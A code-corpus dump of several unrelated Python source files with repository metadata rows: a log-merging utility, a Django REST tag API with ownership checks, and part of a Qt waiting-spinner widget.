] | 1,856 | 2015-01-02T09:32:20.000Z | 2022-03-31T21:45:06.000Z | src/radical/pilot/worker/__init__.py | eirrgang/radical.pilot | ceccd1867dd172935d602ff4c33a5ed4467e0dc8 | [
"MIT"
] | 28 | 2015-06-10T18:15:14.000Z | 2021-11-07T04:36:45.000Z |
__copyright__ = "Copyright 2016, http://radical.rutgers.edu"
__license__ = "MIT"
from .update import Update
from .stager import Stager
| 16.333333 | 60 | 0.714286 |
__copyright__ = "Copyright 2016, http://radical.rutgers.edu"
__license__ = "MIT"
from .update import Update
from .stager import Stager
| true | true |
f71925dc3984013ee3e549051b9ebf44316eb766 | 8,888 | py | Python | exe/modules/Merger.py | KagenoMoheji/ActiveTabGanttLogger | 2d7c88e1c48d56126904d14e780a2588c69336fc | [
"MIT"
] | null | null | null | exe/modules/Merger.py | KagenoMoheji/ActiveTabGanttLogger | 2d7c88e1c48d56126904d14e780a2588c69336fc | [
"MIT"
] | null | null | null | exe/modules/Merger.py | KagenoMoheji/ActiveTabGanttLogger | 2d7c88e1c48d56126904d14e780a2588c69336fc | [
"MIT"
] | null | null | null | import os
import sys
import platform
import datetime
from modules.Public import StrFormatter
class Merger:
    """Merge per-session log folders found inside "ganttlogger_logs".

    ``start()`` asks which log kinds to merge; ``run()`` orders the session
    folders by the ``StartDate`` recorded in each folder's README.txt and
    concatenates their logs into a timestamped ``merged_<datetime>`` folder.
    """

    # Class-level defaults kept for backward compatibility with any code that
    # reads them off the class; real state is rebound per instance in __init__.
    currdir = ""
    mergedir = ""
    run_merge = {
        "active_tab": False,
        "mouse": False,
        "keyboard": False
    }
    strfmr = None

    def __init__(self):
        '''
        Merge logs in folders in "ganttlogger_logs".

        Exits the process immediately unless the current working directory
        is named "ganttlogger_logs".
        '''
        self.strfmr = StrFormatter()
        self.currdir = os.getcwd()
        # Fresh per-instance dict so instances never mutate the shared
        # class-level default.
        self.run_merge = {
            "active_tab": False,
            "mouse": False,
            "keyboard": False
        }
        # os.path.basename handles both "\\" (Windows) and "/" separators,
        # so no platform check is needed to extract the leaf folder name.
        curr_name = os.path.basename(self.currdir)
        if curr_name != "ganttlogger_logs":
            print(self.strfmr.get_colored_console_log("red",
                "Error: You must move to a folder 'ganttlogger_logs'."))
            sys.exit()
        # Timestamped so repeated merges never overwrite each other.
        self.mergedir = "{currdir}/merged_{datetime}".format(
            currdir=self.currdir,
            datetime=datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))

    def start(self):
        """Prompt for which log kinds to merge, create the output folder, run."""
        try:
            select_log_names = set(["active_tab", "mouse", "keyboard"])
            while True:
                print(self.strfmr.get_colored_console_log("yellow",
                    "Select 'all' or names separated by ',' from ('active_tab'|'mouse'|'keyboard').: "), end="")
                input_select = list(map(lambda s: s.strip(), (input().strip()).split(",")))
                if not input_select[0]:
                    print(self.strfmr.get_colored_console_log("red",
                        "Error: Invalid input."))
                    continue
                elif "all" in input_select:
                    if len(input_select) == 1:
                        self.run_merge["active_tab"] = True
                        self.run_merge["mouse"] = True
                        self.run_merge["keyboard"] = True
                        break
                    else:
                        print(self.strfmr.get_colored_console_log("red",
                            "Error: Too many select despite 'all'."))
                        continue
                else:
                    # Symmetric difference: a valid subset selection leaves
                    # only valid (unselected) names here; any invalid token
                    # shows up in the xor and fails the all() check.
                    xor_select = set(input_select) ^ select_log_names
                    if len(xor_select) == 0 or \
                        all(x in select_log_names for x in xor_select):
                        for name in select_log_names:
                            if name in input_select:
                                self.run_merge[name] = True
                        break
                    else:
                        print(self.strfmr.get_colored_console_log("red",
                            "Error: There are some invalid names."))
                        continue
            # makedirs on the dirname of "<mergedir>/" creates mergedir itself.
            os.makedirs(os.path.dirname("{}/".format(self.mergedir)), exist_ok=True)
            print("Created an output folder '{}'.".format(self.mergedir))
            self.run()
        except KeyboardInterrupt:
            print("Exit")
            sys.exit()

    def run(self):
        """Order session folders by README StartDate and merge selected logs."""
        # Candidate folders; anything with "merged" in its name is a previous
        # output and is skipped so it is never re-merged.
        log_folders = {f: None for f in os.listdir(self.currdir)
                       if (os.path.isdir(os.path.join(self.currdir, f)))
                       and (not "merged" in f)}
        remove_keys_list = []
        for key in log_folders.keys():
            readme = "{dir}/{folder}/README.txt".format(dir=self.currdir, folder=key)
            if not os.path.exists(readme):
                remove_keys_list.append(key)
                continue
            # A "StartDate" row is expected within the first 4 lines.
            has_startdate = False
            row_startdate = ""
            with open(readme, "r", encoding="utf-8") as f:
                for row in range(4):
                    row_startdate = f.readline()
                    if "StartDate" in row_startdate:
                        has_startdate = True
                        break
            if not has_startdate:
                print(self.strfmr.get_colored_console_log("yellow",
                    "Warning: File '{readme}' doesn't have a row 'StartDate'.".format(readme=readme)))
                remove_keys_list.append(key)
                continue
            try:
                log_folders[key] = datetime.datetime.strptime(
                    (row_startdate.split(": ")[-1]).strip(), "%Y/%m/%d %H:%M:%S.%f")
            except ValueError:
                print(self.strfmr.get_colored_console_log("red",
                    "Error: Invalid format of a value of 'StartDate' in {readme}.".format(readme=readme)))
                sys.exit()
        # Drop folders without a usable StartDate, then sort chronologically.
        for k in remove_keys_list:
            log_folders.pop(k)
        log_folders = dict(sorted(log_folders.items(), key=lambda x: x[1]))
        if self.run_merge["active_tab"]:
            self.merge_active_tab_logs(log_folders)
        if self.run_merge["mouse"]:
            self.merge_mouse_logs(log_folders)
        if self.run_merge["keyboard"]:
            self.merge_keyboard_logs(log_folders)

    def _merge_logs(self, sorted_folders_dict, log_name, header, done_label):
        """Concatenate one log kind from every session folder into mergedir.

        sorted_folders_dict -- folders keyed in chronological order.
        log_name            -- log file name ("active_tab.log", "mouse.log", ...).
        header              -- header row (without newline) written once at the
                               top; a leading copy inside each source file is
                               stripped before appending.
        done_label          -- log kind name printed on completion.

        Exits the process when a source file is missing.
        """
        with open("{mergedir}/{log_name}".format(mergedir=self.mergedir, log_name=log_name),
                  "a", encoding="utf-8") as af:
            af.write(header + "\n")
            # First column name + separator identifies a header row.
            header_token = header.split("]:+:[")[0] + "]:+:["
            for folder in sorted_folders_dict:
                try:
                    filedir = "{currdir}/{folder}/{log_name}".format(
                        currdir=self.currdir, folder=folder, log_name=log_name)
                    with open(filedir, "r", encoding="utf-8") as rf:
                        log = rf.read().strip()  # Remove the last "\n"
                    splitted_log = log.split("\n", 1)
                    if header_token in splitted_log[0]:
                        # Drop the per-file header; a header-only (or empty)
                        # file contributes nothing instead of crashing.
                        log = splitted_log[1] if len(splitted_log) > 1 else ""
                    if log:
                        af.write(log + "\n")
                except FileNotFoundError:
                    print(self.strfmr.get_colored_console_log("red",
                        "Error: File '{filedir}' not found.".format(filedir=filedir)))
                    sys.exit()
        print("{} merged!".format(done_label))

    def merge_active_tab_logs(self, sorted_folders_dict):
        """Merge every "active_tab.log" (folders pre-sorted by StartDate)."""
        self._merge_logs(sorted_folders_dict, "active_tab.log",
                         "StartTime]:+:[ApplicationName]:+:[TabText", "ActiveTab")

    def merge_mouse_logs(self, sorted_folders_dict):
        """Merge every "mouse.log" (folders pre-sorted by StartDate)."""
        self._merge_logs(sorted_folders_dict, "mouse.log",
                         "Time]:+:[MoveDistance", "Mouse")

    def merge_keyboard_logs(self, sorted_folders_dict):
        """Merge every "keyboard.log" (folders pre-sorted by StartDate)."""
        self._merge_logs(sorted_folders_dict, "keyboard.log",
                         "Time]:+:[PressCount", "Keyboard")
| 48.568306 | 143 | 0.507426 | import os
import sys
import platform
import datetime
from modules.Public import StrFormatter
class Merger:
    """Merge per-session log folders found inside "ganttlogger_logs".

    ``start()`` asks which log kinds to merge; ``run()`` orders the session
    folders by the ``StartDate`` recorded in each folder's README.txt and
    concatenates their logs into a timestamped ``merged_*`` folder.
    """

    # NOTE(review): mutable class-level defaults; run_merge is mutated in
    # place through ``self`` and is therefore shared across instances.
    # Harmless while only one Merger exists per process — confirm before reuse.
    currdir = ""   # current working dir, expected to be .../ganttlogger_logs
    mergedir = ""  # output folder "merged_<timestamp>"
    run_merge = {
        "active_tab": False,
        "mouse": False,
        "keyboard": False
    }
    strfmr = None  # console-color helper (modules.Public.StrFormatter)

    def __init__(self):
        """Validate the working directory and precompute the output path.

        Exits the process unless the current directory is named
        "ganttlogger_logs".
        """
        self.strfmr = StrFormatter()
        self.currdir = os.getcwd()
        # Path separator chosen by OS to extract the leaf folder name.
        is_win = "Windows" in platform.platform(terse=True)
        curr_name = ""
        if is_win:
            curr_name = self.currdir.split("\\")[-1]
        else:
            curr_name = self.currdir.split("/")[-1]
        if curr_name != "ganttlogger_logs":
            print(self.strfmr.get_colored_console_log("red",
                "Error: You must move to a folder 'ganttlogger_logs'."))
            sys.exit()
        # Timestamped so repeated merges never overwrite each other.
        self.mergedir = "{currdir}/merged_{datetime}".format(currdir=self.currdir, datetime=datetime.datetime.now().strftime("%Y%m%d_%H%M%S"))

    def start(self):
        """Prompt for which log kinds to merge, create the output folder, run."""
        try:
            select_log_names = set(["active_tab", "mouse", "keyboard"])
            while True:
                print(self.strfmr.get_colored_console_log("yellow",
                    "Select 'all' or names separated by ',' from ('active_tab'|'mouse'|'keyboard').: "), end="")
                input_select = list(map(lambda s: s.strip(), (input().strip()).split(",")))
                if not input_select[0]:
                    print(self.strfmr.get_colored_console_log("red",
                        "Error: Invalid input."))
                    continue
                elif "all" in input_select:
                    if len(input_select) == 1:
                        self.run_merge["active_tab"] = True
                        self.run_merge["mouse"] = True
                        self.run_merge["keyboard"] = True
                        break
                    else:
                        print(self.strfmr.get_colored_console_log("red",
                            "Error: Too many select despite 'all'."))
                        continue
                else:
                    # Symmetric difference: a valid subset selection leaves
                    # only valid (unselected) names here; any invalid token
                    # appears in the xor and fails the all() check below.
                    xor_select = set(input_select) ^ select_log_names
                    if len(xor_select) == 0 or \
                        all(x in select_log_names for x in xor_select):
                        if "active_tab" in input_select:
                            self.run_merge["active_tab"] = True
                        if "mouse" in input_select:
                            self.run_merge["mouse"] = True
                        if "keyboard" in input_select:
                            self.run_merge["keyboard"] = True
                        break
                    else:
                        print(self.strfmr.get_colored_console_log("red",
                            "Error: There are some invalid names."))
                        continue
            # makedirs on the dirname of "<mergedir>/" creates mergedir itself.
            os.makedirs(os.path.dirname("{}/".format(self.mergedir)), exist_ok=True)
            print("Created an output folder '{}'.".format(self.mergedir))
            self.run()
        except KeyboardInterrupt:
            print("Exit")
            sys.exit()

    def run(self):
        """Order session folders by README StartDate and merge selected logs."""
        # Candidate folders; anything with "merged" in its name is a previous
        # output and is skipped so it is never re-merged.
        log_folders = {f: None for f in os.listdir(self.currdir) if (os.path.isdir(os.path.join(self.currdir, f))) and (not "merged" in f)}
        remove_keys_list = []
        for key in log_folders.keys():
            readme = "{dir}/{folder}/README.txt".format(dir=self.currdir, folder=key)
            if not os.path.exists(readme):
                remove_keys_list.append(key)
                continue
            # A "StartDate" row is expected within the first 4 lines.
            has_startdate = False
            row_startdate = ""
            with open(readme, "r", encoding="utf-8") as f:
                for row in range(4):
                    row_startdate = f.readline()
                    if "StartDate" in row_startdate:
                        has_startdate = True
                        break
            if not has_startdate:
                print(self.strfmr.get_colored_console_log("yellow",
                    "Warning: File '{readme}' doesn't have a row 'StartDate'.".format(readme=readme)))
                remove_keys_list.append(key)
                continue
            try:
                log_folders[key] = datetime.datetime.strptime((row_startdate.split(": ")[-1]).strip(), "%Y/%m/%d %H:%M:%S.%f")
            except ValueError:
                print(self.strfmr.get_colored_console_log("red",
                    "Error: Invalid format of a value of 'StartDate' in {readme}.".format(readme=readme)))
                sys.exit()
        # Drop folders without a usable StartDate, then sort chronologically.
        for k in remove_keys_list:
            log_folders.pop(k)
        log_folders = dict(sorted(log_folders.items(), key=lambda x:x[1]))
        if self.run_merge["active_tab"]:
            self.merge_active_tab_logs(log_folders)
        if self.run_merge["mouse"]:
            self.merge_mouse_logs(log_folders)
        if self.run_merge["keyboard"]:
            self.merge_keyboard_logs(log_folders)

    def merge_active_tab_logs(self, sorted_folders_dict):
        """Append every folder's active_tab.log into the merged output."""
        with open("{mergedir}/active_tab.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
            af.write("StartTime]:+:[ApplicationName]:+:[TabText\n")
            for folder in sorted_folders_dict:
                try:
                    filedir = "{currdir}/{folder}/active_tab.log".format(currdir=self.currdir, folder=folder)
                    with open(filedir, "r", encoding="utf-8") as rf:
                        log = rf.read().strip()  # drop the trailing newline
                        splitted_log = log.split("\n", 1)
                        if "StartTime]:+:[" in splitted_log[0]:
                            # NOTE(review): raises IndexError if the source
                            # file contains only its header row — confirm.
                            log = splitted_log[1]
                        log += "\n"
                        af.write(log)
                except FileNotFoundError:
                    print(self.strfmr.get_colored_console_log("red",
                        "Error: File '{filedir}' not found.".format(filedir=filedir)))
                    sys.exit()
        print("ActiveTab merged!")

    def merge_mouse_logs(self, sorted_folders_dict):
        """Append every folder's mouse.log into the merged output."""
        with open("{mergedir}/mouse.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
            af.write("Time]:+:[MoveDistance\n")
            for folder in sorted_folders_dict:
                try:
                    filedir = "{currdir}/{folder}/mouse.log".format(currdir=self.currdir, folder=folder)
                    with open(filedir, "r", encoding="utf-8") as rf:
                        log = rf.read().strip()  # drop the trailing newline
                        splitted_log = log.split("\n", 1)
                        if "Time]:+:[" in splitted_log[0]:
                            # NOTE(review): raises IndexError if the source
                            # file contains only its header row — confirm.
                            log = splitted_log[1]
                        log += "\n"
                        af.write(log)
                except FileNotFoundError:
                    print(self.strfmr.get_colored_console_log("red",
                        "Error: File '{filedir}' not found.".format(filedir=filedir)))
                    sys.exit()
        print("Mouse merged!")

    def merge_keyboard_logs(self, sorted_folders_dict):
        """Append every folder's keyboard.log into the merged output."""
        with open("{mergedir}/keyboard.log".format(mergedir=self.mergedir), "a", encoding="utf-8") as af:
            af.write("Time]:+:[PressCount\n")
            for folder in sorted_folders_dict:
                try:
                    filedir = "{currdir}/{folder}/keyboard.log".format(currdir=self.currdir, folder=folder)
                    with open(filedir, "r", encoding="utf-8") as rf:
                        log = rf.read().strip()  # drop the trailing newline
                        splitted_log = log.split("\n", 1)
                        if "Time]:+:[" in splitted_log[0]:
                            # NOTE(review): raises IndexError if the source
                            # file contains only its header row — confirm.
                            log = splitted_log[1]
                        log += "\n"
                        af.write(log)
                except FileNotFoundError:
                    print(self.strfmr.get_colored_console_log("red",
                        "Error: File '{filedir}' not found.".format(filedir=filedir)))
                    sys.exit()
        print("Keyboard merged!")
| true | true |
f7192642ac4e4ccc76acb1a05c82ae929b697a48 | 3,870 | py | Python | website/src/globaly/rest_api.py | iamcholo/videoplatform | 72dd1db73e1c940e5992dacbb63feb8fc11394e3 | [
"Apache-2.0"
] | null | null | null | website/src/globaly/rest_api.py | iamcholo/videoplatform | 72dd1db73e1c940e5992dacbb63feb8fc11394e3 | [
"Apache-2.0"
] | 9 | 2020-06-05T19:18:35.000Z | 2022-03-11T23:30:50.000Z | website/src/globaly/rest_api.py | iamcholo/videoplatform | 72dd1db73e1c940e5992dacbb63feb8fc11394e3 | [
"Apache-2.0"
] | null | null | null | import json
from django.conf import settings
from django.http import Http404, HttpResponseRedirect, HttpResponse
from django.conf.urls import url, include
from rest_framework import routers, serializers, viewsets, generics
from rest_framework import status
from rest_framework.decorators import api_view, authentication_classes, permission_classes
from rest_framework.response import Response
from rest_framework.parsers import JSONParser
from rest_framework import generics
from globaly.models import GlobalyTags
from django.contrib.auth.models import User
from user.rest_authentication import IsAuthenticated
from django.db.models import Q
from decimal import Decimal as D
from django.db.models import Max
from django.utils.translation import ugettext_lazy as _
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
class GlobalyTagsSerializer(serializers.HyperlinkedModelSerializer):
    """Serializer exposing the public fields of a GlobalyTags record."""

    class Meta:
        # ORM model being (de)serialized.
        model = GlobalyTags
        # Fields included in API request/response bodies; the autor field is
        # deliberately absent — ownership is set server-side in the views.
        fields = (
            'id',
            'name',
            'slug',
            'meta_title',
            'meta_description',
            'publish',
            'created',
            'modified',
        )
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def tag_list(request):
    """Return every tag owned by the authenticated user."""
    if request.method == 'GET':
        owned_tags = GlobalyTags.objects.filter(autor=request.user)
        payload = GlobalyTagsSerializer(
            owned_tags, many=True, context={'request': request}
        ).data
        return Response(payload)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def tag_details(request):
    """Return a single tag, looked up by the posted 'id'.

    Responds 404 both when the tag does not exist and when it belongs to
    another user, so non-owners cannot probe for tag existence.
    """
    if request.method != 'POST':
        # Defensive fallback; @api_view already rejects other verbs.
        return Response(
            status=status.HTTP_204_NO_CONTENT
        )
    pk = request.data.get('id')
    try:
        tag = GlobalyTags.objects.get(
            pk=pk
        )
    except GlobalyTags.DoesNotExist:
        tag = None
    if tag is None or tag.autor != request.user:
        return Response(
            status=status.HTTP_404_NOT_FOUND
        )
    serializer = GlobalyTagsSerializer(
        tag,
        context={'request': request}
    )
    return Response(serializer.data)
@api_view(['PUT','POST','DELETE'])
@permission_classes((IsAuthenticated,))
def tag(request):
    """Create (POST), update (PUT) or delete (DELETE) a tag.

    POST creates a new tag owned by the requesting user. PUT/DELETE look
    the tag up by the submitted 'id' and answer 404 when it is missing,
    has a non-numeric id, or belongs to another user — mirroring the
    ownership policy of tag_details so it cannot be bypassed here.
    """
    if request.method == 'POST':
        serializer = GlobalyTagsSerializer(
            data=request.data,
            context={'request': request}
        )
        if serializer.is_valid():
            # Ownership is forced server-side, never taken from the payload.
            serializer.save(autor=request.user)
            return Response(serializer.data)
        return Response(
            serializer.errors,
            status=status.HTTP_400_BAD_REQUEST
        )
    if request.method == 'PUT' or request.method == 'DELETE':
        try:
            pk = request.data.get('id')
            tag = GlobalyTags.objects.get(
                pk=int(pk)
            )
        except (GlobalyTags.DoesNotExist, TypeError, ValueError):
            # Missing id, non-numeric id, or no such row: all look like 404
            # (previously TypeError/ValueError leaked as a 500).
            return Response(
                status=status.HTTP_404_NOT_FOUND
            )
        if tag.autor != request.user:
            # Security fix: the original let any authenticated user modify or
            # delete any tag. Answer 404 like tag_details to avoid probing.
            return Response(
                status=status.HTTP_404_NOT_FOUND
            )
        if request.method == 'PUT':
            serializer = GlobalyTagsSerializer(
                tag,
                data=request.data,
                context={'request': request}
            )
            if serializer.is_valid():
                serializer.save()
                return Response(serializer.data)
            return Response(
                serializer.errors,
                status=status.HTTP_400_BAD_REQUEST
            )
        if request.method == 'DELETE':
            tag.delete()
            return Response(
                status=status.HTTP_204_NO_CONTENT
            )
| 30.714286 | 90 | 0.605685 | import json
from django.conf import settings
from django.http import Http404, HttpResponseRedirect, HttpResponse
from django.conf.urls import url, include
from rest_framework import routers, serializers, viewsets, generics
from rest_framework import status
from rest_framework.decorators import api_view, authentication_classes, permission_classes
from rest_framework.response import Response
from rest_framework.parsers import JSONParser
from rest_framework import generics
from globaly.models import GlobalyTags
from django.contrib.auth.models import User
from user.rest_authentication import IsAuthenticated
from django.db.models import Q
from decimal import Decimal as D
from django.db.models import Max
from django.utils.translation import ugettext_lazy as _
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ObjectDoesNotExist
class GlobalyTagsSerializer(serializers.HyperlinkedModelSerializer):
    """Hyperlinked serializer for GlobalyTags API payloads."""

    class Meta:
        # ORM model backing this serializer.
        model = GlobalyTags
        # Fields exposed through the API; ownership (autor) is intentionally
        # not client-writable and is assigned in the views.
        fields = (
            'id',
            'name',
            'slug',
            'meta_title',
            'meta_description',
            'publish',
            'created',
            'modified',
        )
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def tag_list(request):
    """Serialize and return all tags whose author is the requesting user."""
    if request.method != 'GET':
        # Unreachable in practice: @api_view rejects other verbs first.
        return None
    queryset = GlobalyTags.objects.filter(autor=request.user)
    serializer = GlobalyTagsSerializer(
        queryset, many=True, context={'request': request})
    return Response(serializer.data)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def tag_details(request):
    """Look up one tag by the posted 'id' and return its serialized form.

    Non-existent tags and tags owned by other users both answer 404, so
    ownership cannot be probed through this endpoint.
    """
    if request.method == 'POST':
        not_found = Response(
            status=status.HTTP_404_NOT_FOUND
        )
        try:
            tag = GlobalyTags.objects.get(
                pk=request.data.get('id')
            )
        except GlobalyTags.DoesNotExist:
            return not_found
        if tag.autor != request.user:
            return not_found
        return Response(
            GlobalyTagsSerializer(tag, context={'request': request}).data)
    # Defensive fallback; @api_view already blocks non-POST verbs.
    return Response(
        status=status.HTTP_204_NO_CONTENT
    )
@api_view(['PUT','POST','DELETE'])
@permission_classes((IsAuthenticated,))
def tag(request):
    """Create (POST), update (PUT) or delete (DELETE) a tag.

    POST creates a tag owned by the requester. PUT/DELETE fetch the tag by
    the submitted 'id'; a missing, non-numeric, or foreign-owned id answers
    404, matching the ownership policy enforced by tag_details.
    """
    if request.method == 'POST':
        serializer = GlobalyTagsSerializer(
            data=request.data,
            context={'request': request}
        )
        if serializer.is_valid():
            # Ownership is assigned server-side, never read from the payload.
            serializer.save(autor=request.user)
            return Response(serializer.data)
        return Response(
            serializer.errors,
            status=status.HTTP_400_BAD_REQUEST
        )
    if request.method == 'PUT' or request.method == 'DELETE':
        try:
            pk = request.data.get('id')
            tag = GlobalyTags.objects.get(
                pk=int(pk)
            )
        except (GlobalyTags.DoesNotExist, TypeError, ValueError):
            # int(None) / int("abc") previously surfaced as a 500; treat all
            # bad lookups uniformly as 404.
            return Response(
                status=status.HTTP_404_NOT_FOUND
            )
        if tag.autor != request.user:
            # Security fix: without this check any authenticated user could
            # edit or delete any tag (IDOR). 404 avoids existence probing.
            return Response(
                status=status.HTTP_404_NOT_FOUND
            )
        if request.method == 'PUT':
            serializer = GlobalyTagsSerializer(
                tag,
                data=request.data,
                context={'request': request}
            )
            if serializer.is_valid():
                serializer.save()
                return Response(serializer.data)
            return Response(
                serializer.errors,
                status=status.HTTP_400_BAD_REQUEST
            )
        if request.method == 'DELETE':
            tag.delete()
            return Response(
                status=status.HTTP_204_NO_CONTENT
            )
| true | true |
f719265545a7052a735de005b48163850981877d | 8,764 | py | Python | spyder/widgets/waitingspinner.py | suokunlong/spyder | 2d5d450fdcef232fb7f38e7fefc27f0e7f704c9a | [
"MIT"
] | 3 | 2019-09-27T21:00:00.000Z | 2021-03-07T23:28:32.000Z | spyder/widgets/waitingspinner.py | jastema/spyder | 0ef48ea227c53f57556cd8002087dc404b0108b0 | [
"MIT"
] | 3 | 2020-10-13T21:15:23.000Z | 2020-10-13T21:15:24.000Z | spyder/widgets/waitingspinner.py | jastema/spyder | 0ef48ea227c53f57556cd8002087dc404b0108b0 | [
"MIT"
] | 2 | 2021-04-30T01:18:22.000Z | 2021-09-19T06:31:42.000Z | # -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2012-2014 Alexander Turkin
Copyright (c) 2014 William Hallatt
Copyright (c) 2015 Jacob Dawid
Copyright (c) 2016 Luca Weiss
Copyright (c) 2017- Spyder Project Contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
See NOTICE.txt in the Spyder repository root for more detailed information.
Minimally adapted from waitingspinnerwidget.py of the
`QtWaitingSpinner Python Fork <https://github.com/z3ntu/QtWaitingSpinner>`_.
A port of `QtWaitingSpinner <https://github.com/snowwlex/QtWaitingSpinner>`_.
"""
import math
from qtpy.QtCore import QRect, Qt, QTimer
from qtpy.QtGui import QColor, QPainter
from qtpy.QtWidgets import QWidget
class QWaitingSpinner(QWidget):
    """Overlay widget that paints an animated "busy" spinner.

    The spinner is drawn as ``numberOfLines`` rounded bars arranged in a
    circle; a timer rotates which bar is "primary" while the trailing bars
    fade out (and optionally shrink). Port of QtWaitingSpinner.
    """

    def __init__(self, parent, centerOnParent=True,
                 disableParentWhenSpinning=False, modality=Qt.NonModal):
        """Create the spinner.

        parent -- widget the spinner overlays (may be None).
        centerOnParent -- keep the spinner centered on the parent.
        disableParentWhenSpinning -- disable the parent while spinning.
        modality -- window modality applied to the spinner.
        """
        QWidget.__init__(self, parent)

        self._centerOnParent = centerOnParent
        self._disableParentWhenSpinning = disableParentWhenSpinning

        # Appearance/animation defaults (identical to the upstream widget).
        self._color = QColor(Qt.black)
        self._roundness = 100.0
        self._minimumTrailOpacity = 3.14159265358979323846
        self._trailFadePercentage = 80.0
        self._trailSizeDecreasing = False
        self._revolutionsPerSecond = 1.57079632679489661923
        self._numberOfLines = 20
        self._lineLength = 10
        self._lineWidth = 2
        self._innerRadius = 10
        self._currentCounter = 0
        self._isSpinning = False

        # Each timer tick advances the primary line by one position.
        self._timer = QTimer(self)
        self._timer.timeout.connect(self.rotate)
        self.updateSize()
        self.updateTimer()
        self.hide()

        self.setWindowModality(modality)
        self.setAttribute(Qt.WA_TranslucentBackground)

    def paintEvent(self, QPaintEvent):
        """Draw all lines, fading (and optionally shrinking) the trail."""
        self.updatePosition()
        painter = QPainter(self)
        painter.fillRect(self.rect(), Qt.transparent)
        painter.setRenderHint(QPainter.Antialiasing, True)

        if self._currentCounter >= self._numberOfLines:
            self._currentCounter = 0

        painter.setPen(Qt.NoPen)
        for i in range(0, self._numberOfLines):
            painter.save()
            painter.translate(self._innerRadius + self._lineLength, self._innerRadius + self._lineLength)
            rotateAngle = float(360 * i) / float(self._numberOfLines)
            painter.rotate(rotateAngle)
            painter.translate(self._innerRadius, 0)
            distance = self.lineCountDistanceFromPrimary(i, self._currentCounter, self._numberOfLines)
            color = self.currentLineColor(distance, self._numberOfLines, self._trailFadePercentage,
                                          self._minimumTrailOpacity, self._color)
            # Scaling factor applied to the size and thickness of the lines
            # in the trail (1 = constant size).
            if self._trailSizeDecreasing:
                sf = (self._numberOfLines - distance) / self._numberOfLines
            else:
                sf = 1
            painter.setBrush(color)
            rect = QRect(0, round(-self._lineWidth / 2),
                         round(sf * self._lineLength),
                         round(sf * self._lineWidth))
            painter.drawRoundedRect(
                rect, self._roundness, self._roundness, Qt.RelativeSize)
            painter.restore()

    def start(self):
        """Show the spinner and start the animation timer."""
        self.updatePosition()
        self._isSpinning = True
        self.show()

        # Bug fix: the original tested the bound method object
        # (``self.parentWidget``), which is always truthy; call it — as
        # stop() does — so a parentless spinner no longer crashes here.
        if self.parentWidget() and self._disableParentWhenSpinning:
            self.parentWidget().setEnabled(False)

        if not self._timer.isActive():
            self._timer.start()
            self._currentCounter = 0

    def stop(self):
        """Hide the spinner and stop the animation timer."""
        self._isSpinning = False
        self.hide()

        if self.parentWidget() and self._disableParentWhenSpinning:
            self.parentWidget().setEnabled(True)

        if self._timer.isActive():
            self._timer.stop()
            self._currentCounter = 0

    def setNumberOfLines(self, lines):
        """Set the number of lines and restart the rotation from 0."""
        self._numberOfLines = lines
        self._currentCounter = 0
        self.updateTimer()

    def setLineLength(self, length):
        """Set each line's length (pixels) and resize the widget."""
        self._lineLength = length
        self.updateSize()

    def setLineWidth(self, width):
        """Set each line's thickness (pixels) and resize the widget."""
        self._lineWidth = width
        self.updateSize()

    def setInnerRadius(self, radius):
        """Set the empty inner radius (pixels) and resize the widget."""
        self._innerRadius = radius
        self.updateSize()

    # --- simple accessors -------------------------------------------------

    def color(self):
        """Return the base QColor of the lines."""
        return self._color

    def roundness(self):
        """Return the corner roundness of each line (0-100)."""
        return self._roundness

    def minimumTrailOpacity(self):
        """Return the minimum opacity of the faintest trail line."""
        return self._minimumTrailOpacity

    def trailFadePercentage(self):
        """Return the percentage of lines over which the trail fades."""
        return self._trailFadePercentage

    def revolutionsPersSecond(self):
        """Return full revolutions per second (name kept for compatibility)."""
        return self._revolutionsPerSecond

    def numberOfLines(self):
        """Return the number of lines drawn."""
        return self._numberOfLines

    def lineLength(self):
        """Return the length of each line in pixels."""
        return self._lineLength

    def isTrailSizeDecreasing(self):
        """
        Return whether the length and thickness of the trailing lines
        are decreasing.
        """
        return self._trailSizeDecreasing

    def lineWidth(self):
        """Return the thickness of each line in pixels."""
        return self._lineWidth

    def innerRadius(self):
        """Return the empty inner radius in pixels."""
        return self._innerRadius

    def isSpinning(self):
        """Return True while the spinner is animating."""
        return self._isSpinning

    # --- simple mutators --------------------------------------------------

    def setRoundness(self, roundness):
        """Set line corner roundness, clamped to the 0-100 range."""
        self._roundness = max(0.0, min(100.0, roundness))

    def setColor(self, color=Qt.black):
        """Set the base color of the lines."""
        self._color = QColor(color)

    def setRevolutionsPerSecond(self, revolutionsPerSecond):
        """Set rotation speed (revolutions per second) and retime the timer."""
        self._revolutionsPerSecond = revolutionsPerSecond
        self.updateTimer()

    def setTrailFadePercentage(self, trail):
        """Set the percentage of lines over which the trail fades."""
        self._trailFadePercentage = trail

    def setTrailSizeDecreasing(self, value):
        """
        Set whether the length and thickness of the trailing lines
        are decreasing.
        """
        self._trailSizeDecreasing = value

